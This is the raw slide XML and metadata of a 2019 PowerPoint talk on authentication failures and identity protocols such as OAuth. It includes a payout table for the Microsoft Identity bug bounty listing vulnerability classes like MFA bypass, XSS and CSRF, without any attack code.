              <a:tr h="52897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447" marR="95068" marT="95068" marB="950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 Quality Submissions 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95068" marT="95068" marB="950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Baseline Quality Submissions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95068" marT="95068" marB="950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Incomplete Submissions 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95068" marT="95068" marB="950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603176"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4178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Multi-factor Authentication Bypass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$100,000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$50,000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From $1,000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00874"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4178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Standards design vulnerabilities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$100,000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$30,000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From $2,500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68090"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="6788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Standards-based implementation vulnerabilities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$75,000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$25,000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From $2,500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20003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4178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Significant Authentication Bypass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$40,000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$10,000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From $1,000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710002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4178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Cross-Site Scripting (XSS)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$20,000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$5,000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From $1,000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934061"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4178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Cross-Site Request Forgery (CSRF)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$10,000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$3,000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From $500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62733"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4178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Authorization Flaw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$8,000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$4,000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From $500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973149"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="4178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Sensitive Data Exposure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$5,000 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 to $2,500 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From $500 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47" marR="82392" marT="82392" marB="823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094561"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame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DD8C6217-996D-40FE-8DF8-ADF93FAB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30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8129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7ABD86B-BE40-47C4-A57E-265E846D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Bounty Scope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C10180E4-B77B-476B-B4EC-6EAB0F8D5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550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EEF25B5B-47FD-43F2-A7A0-C1E295FC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459" y="62423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31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998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8734-C214-4DA6-BA83-64151D4F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Conclusion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49BD9-3004-472E-955A-6A31CC1FE4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B7CD4E-1628-4222-81CE-8F1947BDF948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bts-sta.fr/la-maison-du-futur-toujours-plus-technologisee-deviendra-t-elle-une-maison-toujours-moins-humanise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EBFFF1-7CC6-46CA-BCA1-C5DC619F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32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856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DA0C6-5462-49D8-AD51-B7D2865B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Someone wiser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  <a:endParaRPr lang="en-US" sz="4000" kern="1200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EAFA6DA-8368-4C85-A6B8-7C1F7366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33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6" descr="A picture containing floor, indoor, table, food&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAE209F-9178-4777-A2DE-3184E1398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307819"/>
            <a:ext cx="4394200" cy="3819141"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8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4EE61FA-B650-42CF-B71A-4EEE4A0D2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307819"/>
            <a:ext cx="4495800" cy="381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08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09FF04C5-13ED-401D-93F5-63281BF30C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575285"/>
            <a:ext cx="10929788" cy="3326449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Rectangle 3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B3812-8E5B-44A5-A76D-2CF34B81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chemeClr val="accent2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Security is hard</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="4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Everyone)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255FD3A0-8CC0-4A88-9D46-3486503F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34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4936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3DC82-B545-430A-8130-664ABC67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Identity is key to kingdom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7" descr="Key">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{753BFAE7-7CDF-457C-9DDB-9C61ABADF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9632" y="2509911"/>
            <a:ext cx="3997637" cy="399763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DEDC7-DB86-4CF8-821F-709AF6FC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35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6505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3C90B-1A51-4D25-B634-7DA5A16A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33518F1-4C57-444C-B47B-DA415982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D489A82-5E64-4EE3-990F-4521E10BA200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D388DC0-8E77-4F82-BB23-90BBF86BC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409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216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AB5C3-FDA6-46E8-A4E6-A29C7527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EB7D5772-91B6-4259-85B9-903B54D06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A2386-1156-417C-B7CA-F9F75B8B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558" y="61153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D489A82-5E64-4EE3-990F-4521E10BA20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37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AEE69-B3C7-406E-ADAF-CB0F8AB8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BDA90751-1D23-4785-988D-B6BFAD8EF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61177" y="2509911"/>
            <a:ext cx="7614546" cy="399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9B1B7-630E-436C-8C9E-13B888B946A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7688906" y="6307493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intonbates.blogspot.com/2016/05/is-economics-becoming-branch-of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F3355E1-90DF-4962-933B-CF3AB681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4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411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6B8EB-C1CB-4338-ACA1-1AFB9AD7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F5DE3BB-BAED-4745-906B-818EE0FF2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94324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3DB5BF7-CB79-47E6-B921-D6E3B409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5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751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E8734-C214-4DA6-BA83-64151D4F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Getting to know Identity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011FB7A3-6AFE-40F9-9FC7-43324E3E4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20460FC-63FB-4963-90BB-E695AE52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6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536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F13F2-EDC1-4AFA-864A-353C6F21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Applications of Identity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6" name="Content Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{640D7B64-BACC-465F-85E6-CC20A331B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016302"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="-86158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3DFF-3AD4-4186-A0A2-8EAF091A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7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CE11AFB-D283-4935-8EBB-D96851B7FD5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5761872" y="-1221495"/>
            <a:ext cx="751690" cy="9161028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43009-3CF8-4A65-BAFC-25CBDFB23B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5144449" y="111045"/>
            <a:ext cx="1903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Resources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10" name="Rectangle 9" descr="Target Audience">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{582CE0DF-80AE-4114-AA02-3839FD57A14C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486399" y="3820685"/>
            <a:ext cx="1369133" cy="148958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Employee Badge">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B75EC0F-1B62-44CF-AC30-33F0BD9AB2E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6309359" y="3394016"/>
            <a:ext cx="515221" cy="556158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AA43571-C614-4922-8702-779E526BF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39"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="643467" y="575276"/>
            <a:ext cx="10929788" cy="332646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DA0C6-5462-49D8-AD51-B7D2865B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Web app example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EAFA6DA-8368-4C85-A6B8-7C1F7366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8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835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95B1-2000-4BF6-9CBE-AA0F0AB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5777753" cy="1096331"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Path to Identity: Milestones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845939-1844-424C-8A73-A7C599E51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57421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317A1-5F7F-43A4-A4C9-CBE8CDB3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52" y="586493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D489A82-5E64-4EE3-990F-4521E10BA20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9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291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1587</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>333</Paragraphs>
  <Slides>37</Slides>
  <Notes>36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Identity Crisis: war stories from authentication failures </vt:lpstr>
      <vt:lpstr> Someone wise once said  </vt:lpstr>
      <vt:lpstr>Goal</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Getting to know Identity</vt:lpstr>
      <vt:lpstr>Applications of Identity</vt:lpstr>
      <vt:lpstr>Web app example</vt:lpstr>
      <vt:lpstr>Path to Identity: Milestones</vt:lpstr>
      <vt:lpstr>Path to Identity: Sign in</vt:lpstr>
      <vt:lpstr>Path to Identity: Auth</vt:lpstr>
      <vt:lpstr>Path to Identity: Token Type</vt:lpstr>
      <vt:lpstr>Path to Identity: Enterprise Vs Consumer</vt:lpstr>
      <vt:lpstr>Protocols and its Nightmares</vt:lpstr>
      <vt:lpstr>Authentication flow: The Players</vt:lpstr>
      <vt:lpstr>Authentication flow: Redirection</vt:lpstr>
      <vt:lpstr>Authentication flow: Redirection</vt:lpstr>
      <vt:lpstr>Authentication flow: Back home</vt:lpstr>
      <vt:lpstr>Authorization flow: Redeem code for Token</vt:lpstr>
      <vt:lpstr>Authentication flow: The Unexpected</vt:lpstr>
      <vt:lpstr>Authentication flow: The Consent</vt:lpstr>
      <vt:lpstr>Oauth in nutshell</vt:lpstr>
      <vt:lpstr>Oauth really doesn't make any sense to anyone (because it's bad, and whoever invented it should feel bad) </vt:lpstr>
      <vt:lpstr>Authentication flow:  What ifs?</vt:lpstr>
      <vt:lpstr>Authentication flow:  What ifs?</vt:lpstr>
      <vt:lpstr>Authentication flow:  What Ifs? Its raining XSS</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Authentication flow:  Enterprise Vs Consumer Identity</vt:lpstr>
      <vt:lpstr>Microsoft Identity Bounty</vt:lpstr>
      <vt:lpstr>Bounty payouts</vt:lpstr>
      <vt:lpstr>Bounty Scope</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Someone wiser </vt:lpstr>
      <vt:lpstr>Security is hard (Everyone)</vt:lpstr>
      <vt:lpstr>Identity is key to kingdom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2019-06-03T04:01:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-03T04:02:19Z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vishalch@microsoft.com</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_f42aa342-8706-4288-bd11-ebb85995028c_SetDate">
    <vt:lpwstr>2019-06-03T04:02:18.5070355Z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be1b9344-8070-4b15-b52c-e091b853ce2b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